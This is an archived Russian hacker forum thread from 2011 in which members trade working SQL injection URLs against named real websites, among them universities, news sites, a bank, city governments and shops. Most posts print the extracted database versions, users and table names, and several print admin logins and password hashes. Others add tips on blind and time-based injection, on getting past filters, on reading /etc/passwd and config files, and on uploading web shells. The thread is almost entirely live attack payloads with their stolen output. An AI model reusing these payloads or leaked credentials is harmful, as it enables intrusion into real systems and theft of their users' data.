тиЦ 80 PR 6
Code:
http://sundaytimes.lk/financenews/articleXYZ100000010.php?id=-1+union+select+concat_ws%280x3a,user%28%29,databas e%28%29,version%28%29%29,2,3,4,5,6,7,8--+
suntimes_sunday@localhost:suntimes_suntimes:5.0.92-community
Code:
http://sundaytimes.lk/financenews/articleXYZ100000010.php?id=-1+union+select+group_concat%28table_name%29,2,3,4, 5,6,7,8+from+information_schema.tables--
тиЦ 10 PR 5
Code:
http://www.financierworldwide.com/gp.php?id=99999999+union+select+1,2,3,concat_ws%28 0x3a,user%28%29,database%28%29,version%28%29%29,5, 6,7--+
financierworld@localhost:financierworld:4.1.20-community-nt
Cennarios
15.10.2011, 17:32
ПРосто хостер
https://www.host.co.in/hostbill/shoppingcart.php?gid=-5%27+union+select+1,2,3,user%28%29,version%28%29,6 ,7,8,9,database%28%29,1,2,3,4,5,6,7,8,9,10,1,2,3,4 ,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 ,9,10,1,2,3,4,5,6,7,8,9,10,61,62,63,64,65,66--+
http://piroclub.ru/product_full.php?id=-3068/**/union/**/select/**/1,2,concat%28login,0x3a,password%29,4,5/**/from/**/users--
увеличил на 4 символа (глюк форума)
aydin-ka
16.10.2011, 13:39
тиЦ 10 PR 3
Code:
http://www.allpartners.ru/shops.php?id=99999999+union+select+concat_ws%280x3 a,user%28%29,database%28%29,version%28%29%29,2,3,4 ,5,6,7--+
ronis@localhost:wwwpultlggru:5.1.25-rc-log
Code:
http://www.allpartners.ru/shops.php?id=99999999+union+select+group_concat%28 table_name%29,2,3,4,5,6,7+from+information_schema. tables--
тиЦ 10 PR 6
Code:
http://www.pierce.ctc.edu/pubs/thepen/print.php?id=99999999+union+select+concat_ws%280x3 a,user%28%29,database%28%29,version%28%29%29,2,3--+
newsletter@localhost:newsletter:5.1.36-community
Code:
http://www.pierce.ctc.edu/pubs/thepen/print.php?id=-99999999+union+select+group_concat%28table_name%29 ,2,3+from+information_schema.tables--
http://www.vedo.ru/guest/guest.php?id=-1/**/union/**/select/**/1,2,concat_ws%280x3a,id_user,name,pass%29,4,5,6,7, 8/**/from/**/userlist
4 символа
ещё 1
http://www.ugatu.ac.ru/Aviator/read_article.php?id=-598/**/union/**/select/**/1,2,concat_ws%280x3a,gb_number,gb_email,gb_mess_ni ck,gb_user_pass%29,4,5,6/**/from/**/gbook%20limit%201,1
http://lux-time.ru/vote.php?id=568-999.9+union+select+1,2,3,email,password,6,7,8,9,10 +from+users+limit+5,1--
5.1.49-rel11.3-log
vibirai@localhost
DB: vibirai_lux
Выбераите что интересно вам
Code:
http://www.handspc.ru/soft/soft.php?id=183/**/union/**/select/**/1,version%28%29,3,4,5,6,7%20,8,9,10,11,12,13,14,ta ble_name,16,17,18,19,20,21,22,23,24,25,26,27/**/from/**/information_schema.tables/**/--/**/
ЮЗЕРЫ
Code:
http://www.handspc.ru/soft/soft.php?id=183/**/union/**/select/**/1,version%28%29,3,user%28%29,5,6,7,8,9,10,11,12,13 ,14,concat_ws%280x3a,id,login,password%29,16,17,18 ,19,20,21,22,23,24,25,26,27/**/from/**/auth_tld/**/--/**/
Вот ещё 1, только тут думать надо, мне лень
Code:
http://job.saleone.ru/findrezum.php?a=2&id_rezum=705+order+by+18
И ещё 1, всё как надо.
Code:
http://efamily.ru/index.phtml?aid=-733+union+select+1,user%28%29,version%28%29,4,conc at_ws%280x3a,ID,user_login,user_pass,user_email%29 ,6,7,8,9,9+from+wp_users+--+&id=101&page=40003
и ещё
Code:
http://www.europa.fm/ru/index.html?c=about&id=-1+union+select+1,2,3,4,table_name,6,7,8+from+infor mation_schema.tables+limit%200,1--
(Ночка без шелов... стыдно...)
OxoTnik, ИМХО зря по РУ работаешь =/
Но это твоё дело...
Итак, Geodata = Google Maps по Американски
PHP:
http://geodata.us/uk_maps/map.php?id=999999'+union+select+null,null,user(),n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null+and+'a'='a
Code:
Current User: relgr_geodata@localhost
Sql Version: 5.0.77
Current DB: relgr_geodata
Data Bases: information_schema
relgr_geodata
OxoTnik said:
Вот ещё 1, только тут думать надо,
мне лень
Code:
http://job.saleone.ru/findrezum.php?a=2&id_rezum=705+order+by+18
Ленивый =)
Code:
Current User: mt_jobpages@localhost
Sql Version: 5.0.90-log
Current DB: mt_jobpages
ТутBlind SQL.
чёт много админок ни 1 шела...пздц как так
http://historicalcenter.ru/news.php?idt=-12+union+select+concat_ws%280x3a,id_users,login,Em ail,passwd%29,2+from+users--
Единственное, что было интересно, это доменная зона.
.GR
http://www.gagarin205.gr/date.php?date=501+and+1=2+union+select+1,user(),ve rsion(),4,5+--+
http://www.aiesep.ulg.ac.be/pages/poster_prize.php?id_event=32+uniOn/*pp*/select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user (),version()),13,14,15--
aiesep@localhost:5.0.77-log
http://www.crifa.ulg.ac.be/archives/edutech/actres/view_record.php?tb=sp&id=12+and/*ppp*/1=2+union/*ppp*/select+1318982400
http://www.gluon.ru/news/?id=-375+union+select+1,2,3,4,concat%28login,0x3a,pwd%2 9,6,7,8,9+from+gluon_users--
Стремлюсь стать админом на всех Россиских сайтах, ну или хотябы на половине
AHTNkiller
20.10.2011, 08:11
http://www.reeltoo.ru/re/live/?show=-22861+union+all+select+1,2,3,4,5,6,7,8,group_conca t%28login,0x3a,pass%29,10,database%28%29,user%28%2 9,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37%20from%20sys_users--
no login,no pass
Leform.ru CY275 PR4
Code:
http://www.leform.ru/news.php?date=2011-4'+union+select+1,2,concat('User:',user(),'%3Cbr%2 0/%3EVersion:',version(),'%3Cbr%20/%3EDatabase:',database()),4,NULL,6,7,8,9+/*+
robert_work
21.10.2011, 21:29
PR-5 ТИЦ-350
Code:
http://www.pilot-film.com/index.php?id=999999.9+union+all+select+0x6E6F,vers ion(),0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x 6E6F,0x6E6F,0x6E6F--
http://www.pilot-film.com/update/index.php - админка
http://www.pilot-film.com/myadmin - админка
aydin-ka
21.10.2011, 21:54
Армянский БАНК
тиЦ 90 PR 5
Code:
http://www.acba.am/index.php?page=-1%27+union+select+1,2,3,4,5,6,concat_ws%280x3a,use r%28%29,database%28%29,version%28%29%29,8,9,10+--+
tigran@localhost:acbadb:5.0.92-log
Мега крутой сайт
http://search.adslclub.ru/?show_dir=1&id=0&id_res=-6/**/union/**/select/**/1,2,3,version(),5,6,7,8,9--
http://wipz.uwp.edu/news.php?id=-1%20union%20select%201,table_name,3,4,5,6,7+from+i nformation_schema.tables+where+table_schema!=0x696 e666f726d6174696f6e5f736368656d61
Московский кинотеатр.
http://www.5zvezd.ru/news/2011/10/20/930+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,1 2,concat_ws%280x3a,version%28%29,database%28%29,us er%28%29%29,14,15,16,17,18,19,20,21,22,23,24,25+--+/
Sloommmik
23.10.2011, 14:02
Target: http://www.hbswany.org/images.html?view_album=20
Host IP: 207.171.1.101
Web Server: Apache
DB Server: MySQL >=5
Resp. Time(avg): 769 ms
Current User: webuser1@localhost
Sql Version: 5.0.82sp1
Current DB: hbswany_org
System User: webuser1@localhost
Host Name: jaws02.omnimagnet.com
Installation dir: /usr/
DB User: 'webuser1'@'%'
Code:
http://secure.ws-montessori.com/produkt/produkt.php?show=-6/**/union/**/select/**/1,2,3,version(),5,6,7,8,9,10--
У кого есть словарь немецких таблиц может попробовать просканить А так.. mysql 4
DB: montessorien
Code:
http://www.sleepmonsters.us/news.php?article_id=-4315+union+select+1,2,3,4,concat_ws%280x3a,version %28%29,database%28%29,user%28%29%29,6,7,8,9,10,11, 12,13--+
5.0.77-log:503342_SleepMonsters:503342_SM_user@172.17.35. 64
Code:
http://www.iceandwine.com/product-list.php?cid=-13+union+select+version%28%29--
aydin-ka
24.10.2011, 21:29
Code:
http://www.morehate.com/ru/press.php?id=49+union+select+1,2,concat_ws%280x3a, user%28%29,database%28%29,version%28%29%29--
morehat1_karalez@localhost:morehat1_morehateru:5.0 .92-log
Code:
http://www.morehate.com/ru/press.php?id=49+union+select+1,2,table_name+from+I NFORMATION_SCHEMA.TABLES--
Code:
http://kuzshop.ru/?p=28&c=-72+union+select+1,concat_ws%280x3a,version%28%29,d atabase%28%29,user%28%29%29,3,4,5--+
5.1.58-log:wwwkuzshopru_evrik:kuzshop@fe107.hc.ru
Code:
http://www.towncrier.us/crierdetail.php?smenu=1&twindow=&sdetail=17860&mad=&wpage=1&skeyword=&sidate=&recID=-1237+union+select+1,2,3,4,concat_ws%280x3a,version %28%29,database%28%29,user%28%29%29,6,7--+
4.0.18-standard:town_crier:milford_crier@localhost
Code:
http://www.sunnet.us/view_news.php?nid=70+union+select+1,2,3,concat_ws% 280x3a,version%28%29,database%28%29,user%28%29%29, 5--+
5.0.45-community-nt:sn_db:sn_usr@localhost
Code:
http://www.ci.mesquite.tx.us/pressrelease/Press_release.php?IDkey=-187+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9--+
4.0.24-nt:news:news@www.cityofmesquite.com
Code:
http://womenofthestorm.us/news_subdet.php?wots_subcontent_ID=-133+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5--+
5.1.52-log:wos:wos_user@localhost
зачем еду удалили?
http://www.lakeerie.edu/news.php?id=0%20union%20select%201,2,version(),4,5 ,6,7,8
http://www.spcc.edu/news.php?id=0%20union%20select%201,2,version(),4,5 ,6,7,8,9,10
http://archive.parsons.edu/view.php?pid=68%20and%20database()='dt_archive'
http://www.mcs.sdsmt.edu/view.php?p=0%20union%20select%201,version(),3,4,5, 6
(в последнюю можно без проблем залить шелл )
aydin-ka
25.10.2011, 21:19
тиЦ 400 PR 3
Code:
http://www.pascal.ru/index.php?id=9999999+union+select+concat_ws%280x3a ,user%28%29,database%28%29,version%28%29%29+--+
pascal.ru@localhost: pascal:5.0.24a-log
Code:
http://www.pascal.ru/index.php?id=9999999+union+select+table_name+from+ information_schema.tables--
Maly.ru Тиц1000 PR6
Code:
http://maly.ru/people.php?name=ZharovM%27+order+by+10++--+
ололо, "hack attempt detected", автор видимо не вкурсе о group by.
Code:
http://maly.ru/people.php?name=ZharovM%27+group+by+11++--+
Впрочем стоит фильтр на UniOn SelEct, не стал париться, ошибка выводится, и этого достаточно.
Code:
http://maly.ru/people.php?name=1%27+and%28select+1+from%28select+ count%28*%29,concat%28%28select+concat_ws%280x3a,u ser%28%29,database%28%29,version%28%29%29+from+inf ormation_schema.tables+limit+0,1%29,floor%28rand%2 80%29*2%29%29x+from+information_schema.tables+grou p+by+x%29a%29+--+
stepashka_
27.10.2011, 14:53
http://www.placeanad.ru/index.php?id_typ=288+union+select+1,2,3,4,5,6,CONC AT_WS(user(),version(),DATABASE()),8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8+--+
4 эх
http://railroad.union.rpi.edu/article.php?article=0%20union%20select%201,2,3,ver sion()
сервесный центр FORD
http://www.ford-nnov.ru/index.php?page=42&idm=-3+and+1=2+union+select+1,2,3,concat_ws(0x3a,@@vers ion,user(),database()),5,6,7,8+--
дальнейшие действия блокирует sweb
http://www.ford-nnov.ru/index.php?page=42&idm=-3+and+1=2+union+select+1,2,3,4,5,6,7,8+from+admin--
AC//DC said:
http://www.ford-nnov.ru/index.php?page=42&idm=-3+and+1=2+union+select+1,2,3,concat_ws(0x3a,@@vers ion,user(),database()),5,6,7,8+--
дальнейшие действия блокирует sweb
http://www.ford-nnov.ru/index.php?page=42&idm=-3+and+1=2+union+select+1,2,3,4,5,6,7,8+from+admin--
Крутил бы через слепую. Я уже писал, что раскручивание скулей через слепую инъекцию spaceweb не блокирует.
В твоём случае:
Code:
http://www.ford-nnov.ru/index.php?page=42&idm=-3+or+ascii(substring((select+anket_forms.email+fro m+fordnnov.anket_forms+order+by+id+limit+0,1),1,1) )=97
Там 207 записей вида email:hash
Вот только авторизации я не нашёл
stepashka_
29.10.2011, 14:27
http://www.vladdom.ru/index.php?mod=page_show&id_pag=-49+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),DATABASE()),6,7,8,9,0,1,2++--+
stepashka_ said:
http://www.vladdom.ru/index.php?mod=page_show&id_pag=-49+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),DATABASE()),6,7,8,9,0,1,2++--+
Обратил внимание на ошибку, filesize() /7
Code:
http://www.vladdom.ru/index.php?mod=page_show&id_pag=-49+union+select+1,2,3,4,concat_ws%280x3a,version%2 8%29,user%28%29,DATABASE%28%29%29,6,0x2e2e2f2e2e2f 436f6e6e656374696f6e732f76646f6d2e706870,8,9,0,1,2 ++--+
Тыкаем на скачать файл ../../Connections/vdom.php и получаем файл.
/etc/passwd:
Code:
http://www.vladdom.ru/index.php?mod=page_show&id_pag=-49+union+select+1,2,3,4,concat_ws%280x3a,version%2 8%29,user%28%29,DATABASE%28%29%29,6,0x2e2e2f2e2e2f 2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764 ,8,9,0,1,2++--+
Code:
http://www.bcspeakers.org/product.php?id=0000000347+UNION+SELECT+1,2,3,4,5,6 ,CONCAT_WS(USER(),VERSION(),DATABASE()),8,9,10,11, 12,13,14,15+--
5.0.77www-bcspeakersro@localhostwww-bcspeakerstest
user:becspeak2803
Code:
http://www.drawminos.com/index.html?id=-218283+union+select+1,2,concat_ws(version(),databa se(),user()),4,5,6+--+
version: 5.0.77
database: drawminos
user: drawn
тИЦ: 10 / PR: 4
Code:
http://luellagloverwilson.co.uk/page.php?p=char(49,57,39)+AND+1=2+UNION+SELECT+1,2 ,CONCAT_WS(USER(),VERSION(),DATABASE())+--
5.0.92-communityxian_lgw@localhostxian_lgw
..очень грустный оказался inject..
2nikp - Прошляпил маленько, CONCAT_WS(['-',USER(),VERSION(),DATABASE())
aydin-ka
30.10.2011, 21:28
тиЦ 10 PR 6
Code:
http://www.dgc.ca/faq2.php?language=0&id=173&faqid=577+union+select+concat_ws%280x3a,user%28%29 ,database%28%29,version%28%29%29--
NDD@localhost:NDD:5.0.22-Debian_0ubuntu6.06.15-log
P.S: первый раз такое вижу
Запрос + код на странице
Code:
http://www.canaramblers.com/index.php?page=13+union+select+1,concat_ws%280x3a, version%28%29,database%28%29,user%28%29%29,3
5.0.91-log:db315217298:dbo315217298@cgi1402.int.bizland.n et
1:1:YES:admin:c50672216e6be50f327c7df719784fe3:
Simpliest said:
Не пойму что за скул, может кто поможет реализовать?
http://il2.aviasibir.ru/mow/?page=pilot&pilotname==WA=Snurf'+and+1='1
Code:
http://il2.aviasibir.ru/mow/?page=pilot&pilotname==WA=Snurf%27+and+1=3+union+select+1,conc at_ws%280x3a,database%28%29,user%28%29,version%28% 29%29++/*
Code:
http://il2.aviasibir.ru/mow/?page=pilot&pilotname==WA=Snurf%27+and+1=3+union+select+1,grou p_concat%28table_name%29+from+information_schema.t ables+where+table_schema!=%27information_schema%27 ++/*
www.abw.byаналог нашему auto.ru
php5/MySQL/nginx
50К/сутки
Вообщем принимает индексный файл хреналион параметров - и 100500ый из них дырявый...
Индексный файл цепляет всего 1 единственную базу "auto" (283 таблицы). Рядом лежит форум (phpBB) но у него наверное своя база со своим юзером ибо его таблиц в тек.базе нет...
Но есть OpenX. Вероятнее всего версия 2.4 (то бишь OpenAds судя по таблицам):
Code:
openads.ab-daily.by/admin/index.php
abd39:738762a9001a63ee8b820f775325d1e7
А еще тут глобальный гемор с выводом! Вывод следует сразу за строкой [I]0x6775695F6865616465725F6163746976655F7461625F636F 6C6F72+--+&type_engine=&year1=1960&year2=2010&cost_val1=&cost_val2=&u_city=7&period=&sort=&x=41&y=6[/COLOR]
[/PHP]
PHP:
view-source:http://www.abw.by/index.php?set_small_form_1=1&act=public_search&do=search&index=1&adv_type=1&model=&marka='+UNION+SELECT+count(*),2,3,4,5+from+users+--+&type_engine=&year1=1960&year2=2010&cost_val1=&cost_val2=&u_city=7&period=&sort=&x=41&y=6
Вообщем have fan
http://www.bioen.utah.EDU/faculty/RDR/index.php?cat_id=-1+union+select+1,version()--
VERSION =5.5.11=
университет штата юта
PR6
BLurpi^_^ said:
http://www.fckhimki.ru/modules/news/index.php?current_id=1
http://www.inharmony.ru/news/news.php?id=31'
Просто решил довести ссылки до нормального вида
Code:
http://www.fckhimki.ru/modules/news/index.php?current_id=1+and+1=2+union+select+1,2,ve rsion(),4,5,6,7,8,9,10,11,12,13
Sql Version: 5.0.90-log
Current User: fckhimki_new1@217.112.35.70
Current DB: fckhimki_new1
Тиц = 750
PR = 0
Юзверей нет =(
Code:
http://www.inharmony.ru/news/news.php?id=31+and+1=2+union+select+1,2,3,4,5,vers ion(),7
Sql Version: 5.0.70-log
Current User: ba3177@localhost
Current DB: ba3177_db
Тиц = 130
PR = 0
Code:
http://www.pdasmart.ru/index.php?action=submenu&mtid=-13+union+select+concat_ws%280x3a,version%28%29,dat abase%28%29,user%28%29%29--+
5.1.56:a1_pdasmart:a1_pdasmart@localhost
admins--id,login,password,supervisor
1:white:555999:1,
tabletkO
03.11.2011, 20:34
Первый пост =)
ТИЦ 275, PR 5
Все легко...
PHP:
http://migavia.ru/corporation/?tid=999999.9+union+all+select+1,version(),user(), 4,database()--
ТИЦ 30, PR 4
Чуть сложнее...
PHP:
http://www.coyc.ru/types.php?tid=1+and(select+1+from(select+count(*), concat((select+(select+concat(user()))+from+%60inf ormation_schema%60.tables+limit+0,1),floor(rand(0) *2))x+from+%60information_schema%60.tables+group+b y+x)tabletkO)+and+1=1
В сорцах похоже проверка на валидность URL, поэтому пришлось делать CONCAT с http://google.com/
Code:
http://www.aquarette.com/adtausch/count.php?click=yes&yourid=8&id=3+and+1=5+union+select+CONCAT(0x687474703a2f2f6 76f6f676c652e636f6d2f,user())+--+
Нас редиректнит на
Code:
http://www.google.com/dbo88894615@212.227.127.162
Code:
http://www.aquarette.com/adtausch/count.php?click=yes&yourid=8&id=3+and+1=5+union+select+CONCAT(0x687474703a2f2f6 76f6f676c652e636f6d2f,concat_ws(0x3b,user(),databa se(),version()))+--+
Code:
http://www.google.com/dbo88894615@212.227.127.162;db88894615;4.0.27-max-log
PR 8 ТИЦ 2000
http://www.washington.EDU/research/ls.php?id=-18+union+select+1,2,3,4,5,6,7,8,version(),10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
УНИВЕР
(по авторитетности вроде нашего МГУ)
VERSION DB =5.0.45=
там есть база с названием wordpress
вытянул оттуда
логин: admin
hash: $P$BCL7jmzj0nFwHYR0Z/tSk5ZtMMuS/2/
+там еще штук 5-6 друпаловских баз.
учетки студентов и пр..
добрался до базы mysql таблица user
host: washington.edu
login: root
hash: *5131AA9105DF140BDBB40A112188C23B35C639F5
http://freeadvertisingforum.com/adserver/image.php?size_id=0%20union%20select%201,2,3,versi on%28%29,5,6,7,8,9,10,11
PR - 4
aydin-ka
06.11.2011, 01:07
Трафф 3-4 К
Code:
http://www.auto-creditline.ru/sell_cat.php?cid=-1%27+union+select+1,2,3,4,concat_ws%280x3a,user%28 %29,database%28%29,version%28%29%29,6,7,8,9+--+
autocre3_site@localhost:autocre3_credit:5.0.92-log
Таблицы
PHP:
cr_vinfax
cr_users
cr_tariffs
cr_special
cr_sms_oss
cr_sms
cr_review_galery
cr_review_comment_galery
cr_review_comment
cr_review
cr_partners
cr_options
cr_news
cr_newcarmake
cr_newcardealer_model
cr_newcardealer_make
cr_newcardealer
cr_newcar_model
cr_kasko
cr_galery
cr_faq
cr_content
cr_color
cr_cities
cr_category
cr_cars
cr_banner2
cr_banner
Содержимое cr_users
PHP:
login
pwd
master
userid
session
P.S: Доступ в админку получите, но там будет облом
Давно меня тут не было
Code:
http://www.dog-perm.ru/modules.php?name=pitomnik&pag=&num_page=1®ion_id=48&poroda_num=0&order=union+select+1,concat_ws%28user%28%29,versio n%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,1 3,14,15%20--
User:dog-permru@78.108.81.161
Version:4.1.22
Database:dogpermru
ТИЦ 140
Osstudio
07.11.2011, 01:39
http://www.tiranatimes.com/news.php?cat=3&id=33+and+1=0+union+select+1,unhex%28hex%28concat_ ws%280x3a3a3a,version%28%29,database%28%29,user%28 %29%29%29%29,3,4,5,6,7,8,9,10,11,12--
4.1.14:::tiranatimes:::ttimes@localhost
Moriarty said:
www.vmdaily.ru
TYC -
4900
Code:
http://www.vm/d/aily.ru/showarticle.php?id=184843' AND 464=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),CHAR(32)) FROM information_schema.TABLES WHERE table_schema=CHAR(111,108,100,115,105,116,101)),1, 1)) != 48),SLEEP(5),464) AND 'isil'='isil
http://www.vm/da/ily.ru/showarticle.php?id=184843' AND 464=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),CHAR(32)) FROM information_schema.TABLES WHERE table_schema=CHAR(111,108,100,115,105,116,101)),2, 1)) > 48),SLEEP(5),464) AND 'isil'='isil
http://www.vm/da/ily.ru/showarticle.php?id=184843' AND 464=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),CHAR(32)) FROM information_schema.TABLES WHERE table_schema=CHAR(111,108,100,115,105,116,101)),2, 1)) > 1),SLEEP(5),464) AND 'isil'='isil
Зачем такие сложности? Там же не слепая скуля.
Code:
http://www.vmdaily.ru/showarticle.php?id=184843%27+and+1=3+union+select+ 1,table_name,3+FROM+information_schema.tables+--+
tabletkO
07.11.2011, 09:51
EDU =/
Поддомен универа Indiana
тИЦ 10, PR 6
Code:
http://www.math.indiana.edu/seminars/seminar.phtml?id=-1+union+all+select+database(),2,3,4,5,6,7--
P.S. Раньше были опубликованы скульи, но на другом поддомене...
Результат - редирект.
ScriptDungeon.com
Code:
http://www.scriptdungeon.com/jump.php?ScriptID=134+and+1=21+union+select+1,2,3, concat_ws(0x3b,version(),database(),user()),5,6,7, 8,9,10,11,12+--+
Результат:
Code:
Перенаправление на:
http://www.scriptdungeon.com/5.1.42;scriptdungeon;dboscriptupdate@localhost
Code:
http://www.alienship.ru/index.php?type=ship&id=20
alienshi@89.111.176.235
5.1.58-log
wwwalienshipru
хуnta
aydin-ka
07.11.2011, 17:50
Alexa Rank 293,690 PR 4
Code:
http://www.dianzinet.com/buy/wnhtml.php ?sec=buycontact &id=99999999999+UNION+SELECT+1,2,3,concat_ws(0x3a,u ser(),database(),version()),5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
icadm@localhost:db_chinaicnet_com:5.0.77
Code:
http://www.dianzinet.com/buy/wnhtml.php ?sec=buycontact &id=99999999999+UNION+SELECT+1,2,3,table_name,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29+from+information_schema.tables
Code:
http://www.dianzinet.com/buy/wnhtml.php ?sec=buycontact &id=99999999999+UNION+SELECT+1,2,3,column_name,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29+from+information_schema.columns
HackZona.ru
CY200 PR2
concat_ws(0x3b,version(),database(),user())
POST /hz.php?name=Search HTTP/1.1
Тело запроса:
Code:
query=s&topic=26' AND 1=2 UNION SELECT 1,2,3,4,5,6,CONCAT_WS(0x3b,version(),database(),us er()),8,9,10,11,12,13 # &category=0&author=123&days=7&type=stories
Code:
5.1.42;hz4647;hz4647@localhost
Запрос там кстати очень интересный:
[CODE]
Code:
select s.sid, s.aid, s.informant, s.title, s.time, s.hometext, s.bodytext, s.counter, a.url, s.comments, s.topic, s.score, s.ratings from voov_stories s, voov_authors a where s.aid=a.aid AND (s.title LIKE '%s%' OR s.hometext LIKE '%s%' OR s.bodytext LIKE '%s%' OR s.notes LIKE '%s%') AND s.informant='123' AND s.topic='26[SQL INJ]' AND TO_DAYS(NOW()) - TO_DAYS(time)
http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,concat_ws%280x3a,id,email, pass,nam%29,5,6,7,8+from+t_users--
Лимит и вперёд
OxoTnik said:
Лимит и вперёд
было =/
/printthread.php?t=21336&page=6508&pp=1
Code:
http://www.enridan.com/place.php?id=8+union+select+1,concat_ws%280x3a,ver sion%28%29,database%28%29,user%28%29%29,3,4,5,6,7, 8--+
4.0.27-log:enridandb:enridan@localhost
aydin-ka
09.11.2011, 15:50
The official site of the Armenian Philharmonic Orchestra
тиЦ 40 PR 5
Code:
http://www.apo.am/index.php?content=1&id=9999999+union+select+1,2,3,4,5,6,7,8,concat_ws% 280x3a,user%28%29,database%28%29,version%28%29%29, 10--
apo_apo@localhost:apo_apo:5.0.92-community-log
Code:
http://www.apo.am/index.php?content=1&id=9999999+union+select+1,2,3,4,5,6,7,8,group_conc at%28table_name%29,10+from+INFORMATION_SCHEMA.COLU MNS--
PHP:
admin
apo_news
artists
attachments
concerts
gallery
guest
Интересная таблица "admin"
Code:
http://www.apo.am/index.php?content=1&id=9999999+union+select+1,2,3,4,5,6,7,8,concat_ws% 28id,0x3a,email%29,10+FROM+admin--
http://www.apo.am/phpinfo.php - Это без комментариев
http://bgnevesta.com/hotornot/viewcomments.php?phid=0%20union%20select%201,usern ame,3,password,5,6%20from%20admin--#
PR 3
maxim2142
10.11.2011, 17:24
Новосибирский Государственный Технический Университет
Code:
http://inform.nstu.ru/index.php?type=mir&stat=617
nginx/0.7.62
PHP/5.2.17 ZendServer/5.0
MySQL >=5
inform@localhost
5.0.77
inform@localhost
hosting.nstu.ru
Data Bases: information_schema
inform
test
http://www.gamer365.hu/profile.php?user_id=128+and+1=0+union+select+1,tab le_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35, 36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,42 ,53,54,55+from+information_schema.tables%20limit%2 043,1--
PR 5 ТИЦ 100
http://www.bgiki.ru/news/more.php?id=-168+union+select+1,2,3,version()--
version =5.1.41-log=
За Русского и Эстонского пилота. Часть 1
Site: joblist.tj
Code:
http://www.joblist.tj/showvacancy.php?id=-1478+union+Select+1,concat_ws(version(),database() ,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23+--+
version: 5.0.91-community-log
database: develop_joblisttj
user: develop_ns@localhost
+ Уязвимый параметр:
Code:
/index.php?catid=11'SQL-Injection'
database found:
Code:
develop_aboutsa
develop_agromoldova
develop_apartments
develop_aport
develop_artishock
develop_blog
develop_bulgaria
develop_cbs
develop_cimul
develop_ctv
develop_decoretto
develop_developweb
develop_egypt
develop_elena
develop_joblisttj
develop_kitchen
develop_livetravelhelp
develop_moldovapiese
develop_mykupe
develop_nikitablog
develop_ritus
develop_rusnac
develop_rybak
develop_rybakforum
develop_turkey
develop_turkeys
develop_vesco
develop_worldofmoldova
develop_za (Самая интересная)
Site: baza.kob.tj
Code:
http://baza.kob.tj/?a=orgtype&id=-45+union+select+concat_ws%280x3a,version%28%29,dat abase%28%29,user%28%29%29,2,3+--+
version: 5.0.92-community
database: kobtj_db
user: kobtj_dbuser@localhost
Site: person.tj
Code:
http://www.person.tj/index.php?id=-938+union+select+1,concat_ws%280x3a,version%28%29, database%28%29,user%28%29%29+--+
version: 4.1.25
database: person
user: user@localhost
Site: dictionary.tj
Code:
http://dictionary.tj/finance/index.php?id=-1012+union+select+1,concat_ws(0x3a,version(),datab ase(),user())+--+
version: 4.1.25
database: base
user: user@localhost
http://www.animalshaveproblemstoo.com/view.php?id=-001+union+select+1,2,3,4,5,version(),7,8,9,10
4.0.30-max-log
Немного американщины =/
Site:adenamontessori.us
PR=2
Inject
Code:
_ttp://adenamontessori.us/product.php?cid=4+and+substring((@@version),1,1)=4
Version:4.1.24-max-log
Database:josephbiz
User:josephbiz@68.178.254.81
-----------------------------------------------------
-----------------------------------------------------
Site:www.ci.bartlesville.ok.us
PR=5
Inject
Code:
_ttp://www.ci.bartlesville.ok.us/category.php?cat=1041+and+substring((@@version),1, 1)=4
Version:4.0.30-max-log
Database:pendergraphics
User:pendergraphics@68.178.254.114
-----------------------------------------------------
-----------------------------------------------------
Site:www.simcom.us
PR=2
Inject
Code:
_ttp://www.simcom.us/product_detail.php?cid=1&pid=14+and+1=2+union+select+1,2,version(),database (),user(),6,7,8,9,10,11,12,13,14,15
Version:4.0.27-max-log
Database:db295004332
User:dbo295004332@74.208.122.71
Code:
http://www.gameplanpros.com/v.php?id=8+union+select+1,2,3,4,5,6,7,8,9,concat_w s%280x3a,version%28%29,database%28%29,user%28%29%2 9,11,12,13--+
5.1.58-community-log:gamepla5_gameplan:gamepla5_gpweb@localhost
Code:
http://www.avk-bearing.ru/n.php?id=8+union+select+1,2,3,concat_ws%280x3a,ver sion%28%29,database%28%29,user%28%29%29,5--+
5.1.41-log:nowhere_db:nowhere_mysql@10.1.82.94
Code:
http://www.mukeshmarwah.net/b.php?id=8+union+select+1,concat_ws%280x3a,version %28%29,database%28%29,user%28%29%29,3,4,5,6,7
5.0.92-log:mm-1967694:mukesh@172.16.0.220.
Code:
http://www.sirohibazar.com/b.php?id=-8+union+select+1,2,concat_ws%280x3a,version%28%29, database%28%29,user%28%29%29,4,5,6
5.0.22-community-nt:news:news@localhost
Code:
http://bergtouren.hohmann-edv.de/bergwanderungen/b.php?ID=-8+union+select+1,2,3,concat_ws%280x3a,version%28%2 9,database%28%29,user%28%29%29,5,6,7--+
5.1.47-log:ilo01247-bergtouren:ilo01247@localhos
stepashka_
11.11.2011, 13:48
